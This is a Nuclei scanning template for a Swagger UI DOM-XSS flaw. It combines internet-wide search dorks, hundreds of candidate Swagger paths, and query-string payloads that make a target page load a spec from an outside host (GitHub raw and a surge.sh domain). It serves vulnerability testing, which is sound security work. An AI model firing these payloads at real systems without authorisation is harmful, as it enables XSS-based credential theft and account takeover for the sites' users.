id: swagger-ui-xss

info:
  name: Swagger UI DOM-XSS
  author: rix4uni
  severity: medium
  description: Swagger UI DOM-XSS >=3.14.1 < 3.38.0
  reference:
    - https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96
    - https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers
  metadata:
    google-query:
      - intext:"Swagger UI" intitle:"Swagger UI"
    shodan-query:
      - http.title:"Swagger UI"
      - http.favicon.hash:"1120729672,-1128940573,-1180440057,-1839822816,1065743122,698799942,-1107597998,1674630873,2079947712,-1022056073,-322615620,-557888293,-2135565029"
      - http.component:"Swagger UI"
    censys-query:
      - services.http.response.html_title="Swagger UI"
    fofa-query:
      - title="Swagger UI"
    hunter-query:
      - web.title="Swagger UI"
  tags: swagger

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{ENDPOINT}}{{URI}}"

    attack: clusterbomb
    payloads:
      ENDPOINT:
        - "index.html"
        - "swagger/index.html"
        - "swagger-ui/index.html"
        - "swagger-ui.html"
        - "docs/index.html"
        - "v1/docs/index.html"
        - "webjars/swagger-ui/index.html"
        - "swagger/ui/index"
        - "restapi/swagger/ui/index"
        - "doc/swagger-ui/index.html"
        - "classicapi/doc/"
        - "browse/api-docs/index.html"
        - "swagger-ui-master/dist/"
        - "api-docs/"
        - "v1/api-docs/"
        - "cfpp/swagger-ui/index.html"
        - "sso/service/rest/swagger-ui.html"
        - "api/containers/v1/ui/"
        - "oms-substance-registry-services/swagger-ui/index.html"
        - "swagger-ui-NEW/index.html"
        - "api/swagger-ui/index.html"
        - "networking-ethernet-software/cumulus-linux-44/api/index.html"
        - "training-material/api/index.html"
        - "data/swagger-ui/index.html"
        - "dosdk/api/docs"
        - "ena/submit/drop-box/swagger-ui/index.html"
        - "csp/gateway/iam/vmwid/api/swagger-ui.html"
        - "api/tedapi/swagger-ui.html"
        - "swagger/ui/index.html"
        - "swagger/dist/index.html"
        - "apidocs/ui/index.html"
        - "documentation/swagger_ui/index.html"
        - "ibd-api/swagger-ui/index.html"
        - "rmm/swagger-ui/index.html"
        - "docs/swagger-ui.html"
        - "docs"
        - "clicktrack/"
        - "api_cass_tracking-docs/"
        - "api_ftp_alpha-docs/"
        - "api_ftp-docs/"
        - "api/documentation"
        - "doc/current/"
        - "api/services/rt/index.html"
        - "identity-api/"
        - "openapi/docs"
        - "api/ui/"
        - "api/doc/"
        - "Swagger/index.html"
        - "api/docs/index.html"
        - "v2/docs/index.html"
        - "api-docs/index.html"
        - "static/"
        - "static/index.html"
        - "single_swagger_doc"
        - "api-doc/"
        - "api/ui/index"
        - "site/docs"
        - "documentation/"
        - "openapi/swagger"
        - "swagger.php"
        - "MavHooksApi/swagger/ui/index"
        - "doc/index"
        - "api/v1/document/index.html"
        - "swagger-ui/dist/index.html"
        - "FluxusCore/swagger-ui/index.html"
        - "api/swagger/index.html"
        - "api/index.html"
        - "docs/static/index.html"
        - "v0/swagger-ui/"
        - "api/v1/docs/index.html"
        - "api/swagger.html"
        - "open-api/index.html"
        - "apidocs"
        - "docs/swagger/index.html"
        - "api/v1/doc/swagger-ui.html"
        - "doc/current/index.html"
        - "api/posvas-validation-service/docs/index.html"
        - "example/index.html"
        - "api/doc"
        - "openapi"
        - "api/docs/"
        - "api/static/index.html"
        - "doc"
        - "deca-ws/swagger-ui/index.html"
        - "swagger-ui/index.php"
        - "api/v1/doc/swagger-ui/index.html"
        - "api"
        - "api/"
        - "doc/index.html"
        - "api/swagger"
        - "explore/"
        - "/api/v1/"
        - "swagger/spec.html"
        - "doc/swagger-ui/"
        - "api/v1/docs/"
        - "-ws/swagger-ui/index.html"
        - "docs/webjars/swagger-ui/index.html"
        - "api/_info/swagger.html"
        - "apis/v1/docs"
        - "docs/v1"
        - "api-explorer/public/"
        - "hyperscale-compliance"
        - "api-docs"
        - "hip/swagger-ui/"
        - "help/v1/index"
        - "doc/"
        - "developer/"
        - "e-extension-ws/"
        - "api-tools/swagger/FiteryAPI-v1"
        - "ai4trust/docs"
        - "document"
        - "api/v1/documentation/"
        - "api/documentation/index.html"
        - "OAM/swagger-ui.html"
        - "govpay/"
        - "member/docs/index"
        - "apidocs/dist/"
        - "api/api-docs/index.html"
        - "docs/swagger-ui/index.html"
        - "v1"
        - "v1/doc/"
        - "api/v1/docs"
        - "api/v1/"
        - "api/v1/swagger"
        - "swagger/ui/"
        - "services2/help/"
        - "Swagger/ui/index"
        - "api/docs/swagger-ui/index.html"
        - "help/index.html"
        - "v2/"
        - "ca/v1/docs/"
        - "rest/v2/swagger-ui/"
        - "object-detection/docs"
        - "reference/index.html"
        - "__docs__/"
        - "api/v2/"
        - "api/v1/sap/docs"
        - "api/v1/banking/swagger-ui.html"
        - "docs/v1/"
        - "API/swagger-ui/index.html"
        - "help/index"
        - "swagger/index/api.html"
        - "apis/swagger-ui.html"
        - "v1/documentation"
        - "apis/duapi/havvarsel/v2/swagger-ui.html"
        - "v1/docs/"
        - "documentation/static/index.html"
        - "swagger/kci/index.html"
        - "swagger-ui"
        - "databroker/ui/"
        - "swagger/notifications/index.html"
        - "latest/docs"
        - "logsis-api/"
        - "api/doc/index.html"
        - "api/v1/index.html"
        - "assets/lib/swagger-ui/index.html"
        - "swagger/actors/index.html"
        - "sample/"
        - "api/v1/doc/"
        - "api/swagger/mdt/index.html"
        - "MLFLongSocketServer/swagger-ui.html"
        - "swagger/externals/index.html"
        - "ApiDoc/index.html"
        - "maincase-swagger"
        - "api/ui/index.html"
        - "api/document-service/docs/index.html"
        - "2.0/index.html"
        - "swagger/ui/index#/"
        - "thumbnail/docs"
        - "swagger/index.html/"
        - "documentation/index.html"
        - "openapi/index.html"
        - "iam/docs"
        - "0.1/ui/index.html"
        - "public/docs"
        - "swagger-ui/4.17.1/index.html"
        - "swagger-ui/"
        - "documentation"
        - "swagger/static/index.html"
        - "webjars/swagger-ui/3.24.0/index.html"
        - "v3/docs"
        - "v1/spec/"
        - "api/docs"
        - "healthmanager/swagger-ui.html"
        - "docs.html"
        - "routes"
        - "ui/index.html"
        - "doc/api-v1"
        - "swagger/swagger-ui/index.html"
        - "info/index.html"
        - "api-documentation/"
        - "api-docs/swagger-ui/index.html"
        - "swag/"
        - "api-spec/viewer/"
        - "shipment/swagger-ui.html"
        - "2023swagger0814/index.html"
        - "swagger.html"
        - "sslapi/swagger-ui/index.html"
        - "v1.4/swagger-ui.html"
        - "doc/v1/index.html"
        - "docs/"
        - "api/v1"
        - "v1/ui/index.html"
        - "api/docs/swagger.json"
        - "public/swagger-ui/index.html"
        - "swagger/index"
        - "documentacion"
        - "docs/api/"
        - "specifications/index.html"
        - "api/docs/v1/"
        - "v1.0/swagger-ui/index.html"
        - "api/2/explore/"
        - "api/api-docs"
        - "api/apidocs"
        - "api-doc"
        - "apidoc"
        - "api_docs"
        - "api/kcdb/swagger-ui/index.html"
        - "api/package_search/v4/documentation"
        - "api/static/swagger-ui"
        - "api/__swagger__"
        - "api/__swagger__/"
        - "api/_swagger_"
        - "api/_swagger_/"
        - "api/swagger/"
        - "api/swagger-resources"
        - "api/swagger-resources/restservices/v2/api-docs"
        - "api/swagger/static/index.html"
        - "api/swagger/swagger"
        - "api/swagger/swagger-ui.html"
        - "api/swagger-ui"
        - "api/swagger-ui/"
        - "api/swagger-ui/api-docs"
        - "api/swagger-ui.html"
        - "api/swagger/ui/index"
        - "api/v1/api-docs"
        - "api/v1/apidocs"
        - "api/v1/swagger/"
        - "api/v1/swagger-ui"
        - "api/v1/swagger-ui/"
        - "api/v1/swagger-ui.html"
        - "api/v2"
        - "api/v2/api-docs"
        - "api/v2/apidocs"
        - "api/v2/swagger"
        - "api/v2/swagger/"
        - "api/v2/swagger-ui"
        - "api/v2/swagger-ui/"
        - "api/v2/swagger-ui.html"
        - "api/v3"
        - "application"
        - "backoffice/v1/ui"
        - "build/reference/web-api/explore"
        - "core/latest/swagger-ui/index.html"
        - "csp/gateway/slc/api/swagger-ui.html"
        - "docu"
        - "graphql"
        - "internal/docs"
        - "nonswagger"
        - "rest/v1"
        - "rest/v1/swagger"
        - "rest/v3/doc"
        - "service/swagger-ui/index.html"
        - "static/swagger-ui/index.html"
        - "__swagger__"
        - "__swagger__/"
        - "_swagger_"
        - "_swagger_/"
        - "swagger"
        - "swagger/"
        - "swagger/api-docs"
        - "swagger-resources"
        - "swagger-resources/restservices/v2/api-docs"
        - "swagger/swagger"
        - "swagger/swagger-ui.htm"
        - "swagger/swagger-ui.html"
        - "swagger/ui"
        - "swaggerui"
        - "swagger/v1"
        - "swagger/v1/api-docs"
        - "swagger/v2"
        - "swagger/v2/api-docs"
        - "ui"
        - "ui/"
        - "v1.0"
        - "v1.1"
        - "v1/swagger-ui.html"
        - "v1.x/swagger-ui.html"
        - "v2"
        - "v2.0"
        - "v2/api-docs"
        - "v3"
        - "pi/v1/apidocs/index.html"
        - "static/api/index.html"
        - "docs/v4/index.html"
        - "docs/v3/index.html"
        - "digital-building-blocks/wikis/domibus/4.2.2/index"
        - "odata/swagger.html"
        - "swag/swagger-ui-master/dist/"
        - "brt/top250nl/download/v1_0/ui/index.html"
        - "docs/api/index"
        - "manual/api/index.html"
        - "dwapi/docs/index.html"
        - "rest-doc/openapi"
        - "1.1.0/api/v2/ui/index.html"
        - "awdbRestApi/swagger-ui.html"
        - "swagger-ui-master/dist/index.html"
        - "baseR4/swagger-ui/index.html"
        - "playground/"
        - "build/reference/web-api/explore/index.html"
        - "modules/custom/cds_apikeys/app/apidocs.html"
        - "cef-web/swagger-ui/index.html"
        - "tap/"
        - "webapihelp/index"
        - "xmart4/external/swagger/index"
        - "ep/swagger/ui/index"
        - "projects/Firely-Server/en/latest/_static/swagger/index.html"
        - "pir/api/docs/v1/index.html"
        - "lizmap-gobsapi-module/api/"
        - "static/swagger/apidocs_index.html"
        - "ena/xref/rest/swagger-ui/index.html"
        - "opencharts-api/v1/swagger-ui/"
        - "tmc/swagger/swagger-ui.html"
        - "openapi/mcamel/postgresql/swagger-4d19ac28.html"
        - "openapi/mcamel/redis/swagger-d2e8f861.html"
        - "v0/docs"
        - "v2/docs"
        - "ift-api/swagger-ui.html"
        - "swagger/api.html"
        - "esenders/webjars/swagger-ui/index.html"
        - "apidocs/index.html"
        - "api/v2/docs/datafoundry.html"
        - "documentation/static-road-data/bicycle/swagger-ui/index.html"
        - "eva/webservices/rest/swagger-ui.html"
        - "docs/v2/index.html"
        - "gfas/v1/"
        - "api-backend-institucional/"
        - "api/root/"
        - "rest-api/swagger.php"
        - "docking/apidoc/index.html"
        - "v1/docs"
        - "documentacao"
        - "api-doc/index.html"
        - "view"
        - "v1/swagger/index.html"
        - "v3/docs/index.html"
        - "partnerapi/ui/index.html"
        - "tfm-api/graphql/v1/"
        - "merchant/swagger/"
        - "v1/"
        - "api/ubl2.1/documentation"
        - "docs/v2/"
        - "api/schema/swagger/"
        - "api/salesforce/index/"
        - "api/v1/doc"
        - "ms-configuration/"
        - "helpui/"
        - "doc/swagger/"
        - "apis/"
        - "api/doc/default/"
        - "swagger/doc/html"
        - "v1/doc"
        - "home/swagger-ui.html"
        - "docs/swagger"
        - "api/schema/swagger-ui/"
        - "explorer/"
        - "cached/swagger/"
        - "docs/swagger/"
        - "api/v1/schema/swagger-ui/"
        - "ui/index"
        - "api/v2/docs/"
        - "schema/swagger-ui/"
        - "api/v1/docs/swagger-ui/"
        - "apidocs/"
        - "docs/swagger-ui"
        - "v4/"
        - "ms-message-processing/"
        - "ms-audit/"
        - "ms-template/"
        - "admin/api/"
        - "api-backend-ciudadano/"
        - "api/v0/swagger/"
        - "onemapchartapi/v1/"
        - "public/"
        - "api-backend-institucion-externa/"
        - "api-notificaciones/"
        - "ms-auth/"
        - "ms-mailbox/"
        - "ms-message/"
        - "ms-entity/"
        - "services/v2/public/documentation"
        - "assets/stratus-api.html"
        - "client/doc/"
        - "api/api-docs/"
        - "tfg-api/graphql/v1/"
        - "back/api/doc/default/"
        - "api/v1/reference/"
        - "aip/doc/"
        - "KTMyKadWeb/"
        - "api/v0/"
        - "cyclemanager-api/swagger-ui.html"
        - "schema"
        - "spec/"
        - "static/swagger/swagger.html"
        - "assets/api/fluctus-api.html"
        - "codoc_api/swagger/"
        - "cache-api-prod/swagger/index.html"
        - "api/v1/documentation"
        - "api/docs/swagger/"
        - "v2/doc/"
        - "apidoc/index"
        - "en/kw/results/free-country-reports"
        - "v1/documentation/index.php"
        - "v2/documentation"
        - "v1.2/"
        - "analytics/apidocs"
        - "v1/api/"
        - "apidoc/"
        - "api_docs/"
        - "gateway/"
        - "wms-compose/index.html"
        - "data-processing/v1/"
        - "risk-analytics/v2/"
        - "risk-model/v2/"

      URI:
        #json
        - "?configUrl=https://raw.githubusercontent.com/rix4uni/swagger-xss/main/swagger.json"
        
        #yaml
        - "?url=https://raw.githubusercontent.com/rix4uni/swagger-xss/main/swagger.yaml"

        #base64
        - "?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ=="

    threads: 100
    # stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Swagger UI"
          - "SwaggerUIBundle"
          - 'swagger-ui.css">'
          - 'id="swagger-ui"'

      - type: status
        status:
          - 200
